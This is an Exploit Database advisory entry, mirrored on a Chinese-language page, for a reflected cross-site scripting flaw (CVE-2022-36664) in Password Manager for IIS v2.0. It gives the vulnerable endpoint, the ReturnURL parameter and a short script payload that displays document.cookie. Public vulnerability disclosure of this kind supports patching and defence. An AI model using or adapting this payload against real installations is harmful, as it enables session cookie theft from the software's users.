Password Manager for IIS v2.0 – XSS

• Exploit Database
• 16 阅读

• 作者： VP4TR10T
  日期： 2023-03-25
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/51055/

• # Exploit Title: Password Manager for IIS v2.0 - XSS
  # Exploit Author: VP4TR10T
  # Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
  # Software Link: http://passwordmanager.adiscon.com/
  <http://passwordmanager.adiscon.com/>
  # Version: *Version 2.0
  # Tested on: WINDOWS
  # CVE : CVE-2022-36664
  
  
  Affected URI (when changing user password):
  POST /isapi/PasswordManager.dll HTTP/1.1
  
  Affected Parameter in http
  payload:*ReturnURL*=<script>alert(document.cookie)</script>
  
  *Cordially,*